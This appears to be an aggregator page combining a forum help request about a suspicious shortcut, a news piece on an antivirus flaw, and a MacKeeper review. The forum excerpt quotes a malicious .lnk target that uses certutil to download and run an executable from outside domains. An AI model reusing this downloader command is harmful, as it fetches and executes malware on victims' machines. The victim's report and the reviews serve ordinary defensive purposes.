Featured Post

.Lnk file with cmd usage - Virus, Trojan, Spyware, and Malware Removal Help - BleepingComputer

Image
.Lnk file with cmd usage - Virus, Trojan, Spyware, and Malware Removal Help - BleepingComputer.Lnk file with cmd usage - Virus, Trojan, Spyware, and Malware Removal Help - BleepingComputerPosted: 06 Jul 2020 11:33 AM PDT Hi all,Looking for feedback on the likelihood my double clicking of a bad .lnk file caused damage.. When I did double click it, I remember getting a standard windows dialog box. I believe it said the path did not exist or shortcut unavailable.. I'm not finding anything in my startup folder for C:\programdata or my username appdata startup folder...  I ran scans with malwarebytes, Hitman with no results.The .lnk file target was:%ComSpec% /v:on/c(SET V4=/?8ih5Oe0vii2dJ179aaaacabbckbdbhhe=gulches_%PROCESSOR_ARCHITECTURE% !H!&SET H="%USERNAME%.exe"&SET V4adKK47=certutil -urlcache -f https://&IF NOT EXIST !H! (!V4adKK47!izub.fun!V4!||!V4adKK47!de.charineziv.com!V4!&!H!))>nul 2>&1The .lnk file 'start-in' was:"%APPDATA%\Mic…

28 antivirus programs are vulnurable to hacker hijacking. How to fix it. - Komando

28 antivirus programs are vulnurable to hacker hijacking. How to fix it. - Komando


28 antivirus programs are vulnurable to hacker hijacking. How to fix it. - Komando

Posted: 04 May 2020 05:06 PM PDT

No matter what kind of system you're using, a strong antivirus program is essential for keeping dangerous malware at bay. Without one, your computer can fall to all sorts of nasty attacks — including hacks that can steal your money or personal data.

Antivirus and antimalware programs work by scanning your computer for hostile files you may have been exposed to or downloaded accidentally. And these days, with so many scammers altering files to carry a malware payload, frequent scanning is more essential than ever. Tap or click here to see what hackers are using to transmit viruses.

But what happens when malware attacks your antivirus program itself? This sounds like a nightmare scenario, but it's closer to reality than you think. A critical flaw has been discovered in some of the most popular antimalware programs on the web, and if it's exploited, hackers can turn your defenses against you and delete your system files!

Who watches the watchmen?

Security researchers at Rack911 have confirmed a critical flaw found in 28 of the most popular antimalware programs on the market. If exploited, the antimalware program itself can be infected and hijacked, which can let hackers scan your computer and delete ordinary system files as if they were malware.

Taken to its logical conclusion, this plan of attack can absolutely devastate an infected computer. Researchers note that hackers using the exploit could delete virus definitions and render the antimalware program ineffective. Alternatively, they could delete essential operating system files — which could prevent a computer from booting.

The attack cannot be remote-controlled, but it can be initiated via a malware payload that hackers trick their victim into downloading. Once the malware is installed, it can rewrite the names of important system files to match its own. Then, the antimalware would catch the file and delete it along with the system file.

The result: a "bricked" computer. Worst of all, because this flaw targets antimalware programs, the issue isn't limited by the operating system. Computers running Windows 10, Linux and macOS are all at risk for this hack!

What can I do to protect myself? Do I need new antivirus software?

Because the issue is so serious, many of the biggest players in the cybersecurity world have already patched their software to remove the exploit. You can see the complete list of affected software below, as well as whether or not the patch is available.

If the program is patched, update your software as soon as possible. You can usually find the option to search for updates under the settings or preferences menu of your antivirus software.

  • Avast: Avast Free Antivirus 
  • AVG: AVG AntiVirus for Mac. Patched.
  • Avira: Avira Free Antivirus for Windows. Patched.
  • Bitdefender: Bitdefender Total Security for Mac. Patched; Bitdefender GravityZone for Windows, Linux and Enterprise. Patched.
  • Comodo: Comodo Endpoint Security For Windows, Linux and Enterprise. Patched.
  • ESET: ESET Cyber Security for Mac. Patched; ESET File Server Security for Linux and Enterprise Patched.
  • F-Secure: F-Secure Computer Protection for Windows and Enterprise. Patched; F-Secure Linux Security for Linux and Enterprise. Patched.
  • FireEye: FireEye Endpoint Security for Windows and Enterprise
  • Kaspersky: Kaspersky Internet Security for Mac. Patched; Kaspersky Endpoint Security for Windows, Linux and Enterprise Patched.
  • Malwarebytes: Malwarebytes for Windows. Patch incoming.
  • McAfee: McAfee Total Protection for Mac; McAfee Endpoint Security for Windows and Enterprise; McAfee Endpoint Security for Linux and Enterprise. Patched.
  • Microsoft: Microsoft Defender for Mac and Enterprise. Patched.
  • Norton: Norton Security for Mac. Patched.
  • Panda: Panda Dome for Windows
  • Sophos: Sophos Home for Mac. Patched; Sophos Intercept X for Windows and Enterprise. Patched; Sophos Antivirus for Linux and Enterprise. Patched.
  • Webroot: Webroot SecureAnywhere for Windows and Mac. Patched.

As you can see, the only major holdouts at the moment are Avast, FireEye, Malwarebytes, and Panda. Malwarebytes notes that it has a patch on the way, so expect the update to be pushed in the near future.

Interestingly enough, Microsoft's own Windows Defender products for Windows 10 are not affected by this issue. Microsoft told Tomsguide that none of its antimalware products are "currently vulnerable to the methods discussed in this research."

If you're concerned about the threat of malware and own a PC, stick to Windows Defender for now. It's already extremely robust, and thanks to Microsoft's statement, we now know it won't accidentally change virus definitions or delete critical system files.

The only thing Windows Defender has to worry about, it seems, are updates from Microsoft itself. Tap or click here to see how one bad update destroyed Windows Defender.

If you're not using Windows, or rely on a different antimalware program, make sure to update your software to the latest edition if a patch is available. Otherwise, you'll need to switch and download new antimalware software that will scan your system without the risk.

Fortunately, there are plenty of excellent options to choose from. Tap or click here to see the best free system scanners online.

Until the flaw is completely eliminated, avoid downloading any files you're not 100% sure about. Avoid opening emails from unknown senders, and try to shy away from downloading movies or TV shows illegally. This is the biggest threat vector for malware at this time. Tap or click here to see why.

If you play it safe, you might not even need to run a system scan more than occasionally. That's the beauty of the web: It's only as dangerous as you allow it to be.

MacKeeper - Review 2020 - PCMag UK

Posted: 19 May 2020 01:43 PM PDT

By now, most Mac users have realized that their precious devices aren't immune to malware attack. Oh, they make a tougher target than a Windows box, but attacks do get through, so installing a Mac antivirus is important. Given that the attack surface is rather smaller than for Windows, though, it's nice when your security product goes beyond malware protection. MacKeeper includes a host of features related to security, privacy, and performance. It's expensive, though, and lacks some features we've come to expect in antivirus products, regardless of platform.

MacKeeper's main window features a menu down the left side, divided into Cleaning, Performance, Security, and Privacy items. On the right side is a built-in chat support system. The Find & Fix option, selected by default, features a big button to launch a scan at center bottom, and a diagram of things that will be (or have been) scanned occupying most of the screen. It's a bit busy, but it's easy enough to navigate.


MacKeeper Main Window

A Checkered Past

If you're a long-time follower of Mac security, you may be familiar with MacKeeper, and not in a good way. Some years ago, the company had a reputation as scareware, meaning that its free version reported fake problems to scare users into paying for a fix. In 2014, the company was involved in a lawsuit over these behaviors, and behaviors of their out-of-control affiliates.

More recently, though, MacKeeper has aimed to shed that rough reputation. The company, now called Clario, sought and obtained certification from AppEsteem, a site devoted to eliminating deceptive practices by apps of various types. MacKeeper's press release notes that this certification is "something that none of the leading brands in the market have achieved." That statement is itself just a bit deceptive, because, as AppEsteem's CEO confirmed, brands that have never been accused of deceptive practices don't have any need for the certification. Still, MacKeeper does seem to have reined in those rogue affiliates and cleared away any tinge of scareware behavior.

You can still find traces of the old MacKeeper. When I wanted to determine whether the product had scheduled antivirus scanning, I tried to check the help system. However, choosing MacKeeper Help received the terse response, "Help isn't available for MacKeeper." A simple Google search turned up a help page devoted to the old version, using the old company name, Kromtech, with advice not at all relevant to the current MacKeeper. I'm sure they'll sort this out, but it's a bit jumbled at present.

Pricing and OS Support

Any way you slice it, MacKeeper is expensive. If you choose to pay for it on a monthly basis, it's $14.95 per month, or a whopping $179.40 per year. Choosing to pay for a year at a time gets that down to $9.95 per month, which is $119.40 per year. Admittedly, the product is frequently discounted. As of this writing, the discounted yearly price is $74.52.

Airo Antivirus for Mac and Intego are on the pricey side, both at $99.99 per year, but that price gets you three licenses for each. It's true that MacKeeper goes way beyond mere antivirus, including VPN protection, ad blocking, system cleanup, and more. But Norton's Mac product is actually a full-scale cross-platform security suite, and your $99.99 subscription to Norton gets you five suite licenses plus five no-limits VPN licenses. The most common price for a single macOS antivirus license is around $40 per year.

McAfee AntiVirus Plus (for Mac) deserves special mention. It runs $59.99 per year, less than half MacKeeper's price. And with one subscription you can install McAfee protection on all devices in your household, whether they run macOS, Windows, iOS, or Android.

You can, of course, get macOS antivirus protection for no charge at all. Avast, AVG, Avira Free Antivirus for Mac, and Sophos all offer free protection for your Mac. As I'll detail below, Avast and AVG also get perfect scored from two independent labs.

Some macOS security products only work with the newest versions of macOS. For example, Avira, Norton, and Trend Micro require macOS 10.13 (High Sierra) or newer. Others are happy with macOS versions that can charitably be called antique. ProtectWorks and ClamXAV (for Mac) are happy with anything from 10.6 (Snow Leopard) to the present. MacKeeper falls in between; like Bitdefender, it requires at least 10.9 (Mavericks).

Getting Started With MacKeeper

Installing MacKeeper went quickly. I did have to give special permission for MacKeeper to access the sensitive Downloads, Documents, and Desktop folders, but that's normal in macOS Catalina. Right after installation, it invited me to scan the Mac. The scan didn't take long, and it turned up lots of things to fix.

Clicking to fix those problems brought me to a page asking me to shell out cash and purchase the program. I had a license key supplied by the company, but the purchase page didn't provide a place to enter it. I tried using the built-in chat support to find out where to enter that key and had a rather odd experience. The chat agent seemed to think I had somehow stolen the key, and wanted to investigate my purchase. I dropped that conversation and got the information from my helpful Clario contact. With the product activated, I ran the scan again.


MacKeeper Four Part Scan

The scan window displays as four quadrants, Cleaning, Performance, Security, and Privacy. In the Cleaning quadrant, MacKeeper reported it could clean up junk files and application leftovers. For Performance, it reported an out-of-date app and one "useless startup item." In the Security area, I learned the Mac contained no adware or potentially unwanted applications (PUAs).

What surprised me was the recommendation to enable virus protection. How was that not enabled out of the box? My company contact explained, "MacKeeper is mainly a performance and cleaning app". Since the initial scan flags the absent antivirus as a problem to fix, users will get antivirus problem when they choose to fix things, but it still seems odd for a program whose description on the web states that it "blocks malware, viruses, and spyware attacks to protect what matters most—your privacy."

As another test, I downloaded the internationally-supported test file from eicar.org. This is a harmless file that virtually all antivirus vendors agree to detect as a virus, for a kind of sanity check. I downloaded two versions, the basic file and one with a TXT extension. MacKeeper didn't react to the download, or to the Mac opening the text file, but when I scanned the files it identified them as "Virus." I concluded that MacKeeper doesn't use on-access scanning.

Interestingly, the separate Adware Cleaner component does come enabled out of the box. The scan also pointed out a need to install the Private Connection VPN and add MacKeeper's AdStop extensions to Safari and Chrome. Note that the browser extensions strictly block ads. MacKeeper doesn't attempt to divert the browser from malware-hosting sites, or fraudulent (phishing) sites the way Bitdefender, Kaspersky Internet Security for Mac, Norton, and most competing products do. Nor does it mark up dangerous links in search results.

Scans and Malware

I couldn't tell how long the antivirus scan took when it was part of the four-part scan mentioned above, so I ran a scan separately. It finished in six minutes, the fastest of any recent product besides Webroot SecureAnywhere Antivirus (for Mac), which did the job in less than three minutes.

Of course, different products may define a full scan differently. ESET required over 90 minutes for a full scan, and Sophos Home Free (for Mac) well over two hours. We just don't know what they spent that extra time doing.

I don't have a collection of macOS malware for testing, but most Mac antivirus products do their best to wipe out any Windows malware they encounter. When I scanned a USB drive containing my current collection of Windows malware samples, MacKeeper quickly wiped out 83 percent of them. That's decent, but quite a few products have done better. Webroot wiped out 100 percent of the Windows malware samples, and ESET Cyber Security (for Mac) eliminated 93 percent.


MacKeeper Caught Windows Malware

I looked for the ability to schedule a scan, but didn't find it at first. After some digging, I found it in settings. MacKeeper runs a scan every 24 hours. There's no option to change the schedule for that regular scan. All you can do is turn it on or off. I appreciate that it's on by default.

No Help From the Labs

When I evaluate Windows antivirus products, I perform hands-on tests using a collection of real-world malware samples that I curate and analyze myself. I use several hand-coded utilities to aid in my testing. And all that goes out the window when my testing happens on a Mac. My programs don't run on a Mac, and I have no similar collection of macOS-focused malware. Thus, results from the independent testing labs become very important.


Lab Test Results Chart - MacKeeper

As you can see, MacKeeper doesn't show up in the test results from either of the labs that report on Mac antivirus tools. Several other products likewise don't show up, ESET, McAfee, Sophos, and Vipre Advanced Security (for Mac) among them. Those four at least did appear up in one or more past tests. MacKeeper is just absent, leaving me with no easy way to determine its efficacy.

At the other end of the lab score scale we find Avast, AVG, Bitdefender Antivirus for Mac, Kaspersky, and Trend Micro Antivirus for Mac. These four accomplished 100 percent detection in testing by AV-Comparatives and 18 of 18 possible points in tests from AV-Test Institute. With perfect scores from two labs, you can be sure these are effective.

Bonus Features for Security and Privacy

As I noted earlier, MacKeeper can install the StopAd ad-blocking extension in Chrome and Safari. It also includes an Adware Cleaner, separate from the antivirus. But the security and privacy bonuses don't stop there.

Track My Mac

Track My Mac isn't installed by default. When you enable this feature, it provides basic antitheft features. Initially, only location tracking is enabled, allowing you to find the device by logging in to your MacKeeper account online. In testing, I found that its location tracking wasn't accurate. I don't mean it got the wrong block—I mean it put my Mac on the other side of the city, 10 miles away.

You can also configure Track My Mac to take a snapshot of anybody who enters the wrong password trying to log into your Mac. By default, it snaps on every error, but you can set it to wait for the second, fifth, or tenth failed attempt. Photos are available both on your device and online.


MacKeeper Location Tracking

This tool also lets you configure a keystroke to quickly invoke the Mac's lockscreen. I'm not sure why that's necessary, given that you can just press Control+Command+Q.

ID Theft Guard

Has your email account been exposed in a data breach? You can find out by entering it in the ID Theft Guard scanner. You can't just enter any address, though. To invoke the scanner, you must enter a confirmation code sent to that address.

Once I saw the scan results, I realized why that confirmation is required. You not only get a list of breached accounts, you get the option to view the exposed password. It wouldn't do to let users get those passwords for accounts they don't own. I've encountered breach-checking tools before, but I don't recall seeing one that displayed the exposed passwords.

Naturally, you'll want to change those now-public passwords. As you do, you can mark each as secured in the app. And once you've cleared up all the existing problems, you can set MacKeeper to monitor the email address for any future breaches.

Private Connect VPN

Impressively, MacKeeper comes with an integrated VPN. When you connect to the internet through the VPN, all your communications travel through an encrypted channel to the selected VPN server. That keeps anyone, even the owner of the network you're using, from snooping on your web traffic.

In addition, your internet requests seem to come from the server, not from your own IP address. This hides you from trackers trying to get your location, and can even let you access content that's not available in your country.

Looking at the list of available servers, I was a bit confused at first. I saw a bunch of US locations near me in the Pacific Northwest, then one in Canada, then more US, then Mexico, and so on. I realized after a moment that the list is ordered by distance from my current location. I'd like an option to order the list by country, alphabetically. How am I supposed to know whether Colombia or Ireland is closer to my location?

In all, MacKeeper offers 60 server locations in 36 countries. These include locations in Africa and South America, regions often underserved by VPN networks. Servers are also available in several VPN-unfriendly countries, among them China, Russia, and Turkey.


MacKeeper Private Connect VPN

My company contact confirmed that MacKeeper licenses the server network from "a major player in the VPN space," but that MacKeeper is "contractually not allowed to disclose which." I scrolled through the near-endless list of third-party credits without finding a clue. I did learn that Private Connect uses the OpenVPN protocol, which we consider the best choice.

Private Connect is Mac-only, and not available separately from MacKeeper, so you won't find a review of it as a standalone product. I can report that it's very simple to use. Just pick your server (or let the VPN pick) and turn it on. There are no other settings. You won't find advanced options like kill switch or split tunneling. But then, most users don't understand or need those. VPN protection is a nice addition to MacKeeper.

Update Tracker

MacKeeper categorizes the Update Tracker component as a performance enhancer, but I consider it just as much a security tool. Malware coders constantly seek security holes in macOS and popular programs, and security researchers constantly create and release patches for those holes. If you don't apply all available security patches, you risk having your Mac compromised.

MacKeeper runs the update check as part of its big four-part scan, and it automatically installs any needed updates automatically when you choose to fix found problems. You can also run the update scan separately. There's an option to exempt specific programs from updates, but I can't think of a good reason to do that.

Performance Features

MacKeeper goes beyond security with a collection of features aimed at improving Mac performance. I've already mentioned the Update Tracker as protecting security. It also keeps your apps running at their best, using the latest updates.

The Memory Cleaner promises to enhance performance by freeing up any RAM that's not actively in use. You can click for a quick cleanup, view details of memory usage, or see just how much memory each app is using. I do wonder how necessary this is, in the modern world of powerful processors and plentiful memory.


MacKeeper Memory Cleaner

Go for a Login Items scan to see just what processes launch every time you boot up your Mac. MacKeeper identifies any that it finds "useless" and automatically disables them. You can manually disable any that aren't locked by the system. This kind of startup management feature is common in Windows security products, less so in those aimed at macOS.

Cleaning Features

System cleanup doesn't relate to security except insofar as it cleans up traces of your computer and internet usage, but it's a common addition to security suites for Windows. MacKeeper helps keep your Mac free of useless files in several ways.

As the name suggests, Safe Cleanup aims to get rid of junk files and only junk files. Running it shouldn't ever remove anything important. As with many of this product's features, it runs automatically during a full system scan, but you can also launch it at will.

The Duplicates Finder requires a bit more finesse. There's no need to keep multiple copies of the same data files, but when you clean up, you need to make sure you leave the single remaining copy in the correct location. MacKeeper promises to keep the originals and delete only copies, but I would review its proposed actions before proceeding.


MacKeeper Duplicates Finder

On my test Mac, the scan found 49 sets of duplicates, most of them script files. I am impressed that it found pairs of identical screenshots taken at different times—that means it's comparing content, not just filenames. Norton 360 Deluxe (for Mac) also scans for duplicates, and even reports similar files such as 720p and 1080p versions of the same movie.

Uninstalling files from a Mac isn't always simple. For some apps, you simply drag from the Finder to the trash. Others require use of a dedicated uninstaller. And you can't always be sure you eliminated every trace of a program. Smart Uninstaller helps with this problem. You start by scanning for apps that can be uninstalled. When you choose one for removal, MacKeeper carefully removes all traces.

Premium Services

There's one item from the left-rail menu that I haven't mentioned, and that's Premium Services. When you invoke this item, you're invited to run a free system checkup in conjunction with a live chat agent. Going forward, you can use Premium Services to solve absolutely any tech problem, on any device.

With a Premium Services subscription, you can get support 24/7, with unlimited support calls, on any tech topic, including tuning your Mac to the max, support for any app, and help setting up new devices. The Premium Services page online touts a wild variety of problems they've solved, from getting a voice-controlled microwave working to configuring a computerized embroidery machine.

The catch? It's super-expensive, at $696 per year or $68 per month. McAfee's similar Concierge Techmaster Gold offers a similar service and goes for $179.95 per year. The Ultimate Services Bundle from Trend Micro costs about the same, and comes with a five-license subscription to Trend Micro Maximum Security, which alone would list for $89.95 per year.

Other security companies offer premium support options at higher or lower levels, but all for quite a bit less than MacKeeper asks.

Go With a Proven Winner

MacKeeper offers tons of security, privacy, and performance features beyond basic antivirus protection. However, it lacks expected features such as blocking access to malicious and fraudulent URLs, and it has no lab reports to back up its promised malware-fighting abilities. On top of that, it costs more than products with a proven track record—a lot more.

We've identified three products that merit our Editors' Choice honor in the realm of Mac antivirus: Bitdefender Antivirus for Mac, Kaspersky Internet Security for Mac, and Norton 360 Deluxe (for Mac). Bitdefender and Kaspersky earned perfect scores from two labs, as did Norton from the one lab that tested it. All three offer a broad range of features, not just antivirus. All three also cost significantly less than MacKeeper.

MacKeeper Specs

On-Demand Malware Scan Yes
On-Access Malware Scan No
Website Rating No
Malicious URL Blocking No
Phishing Protection No
Behavior-Based Detection No
Vulnerability Scan Yes
Firewall No

Best Antivirus Picks

Further Reading

Comments

Popular Posts

System detected an overrun of a stack-based buffer in this application [FIX] - Windows Report

Valorant anti-cheat lead answers many questions on Reddit - Millenium US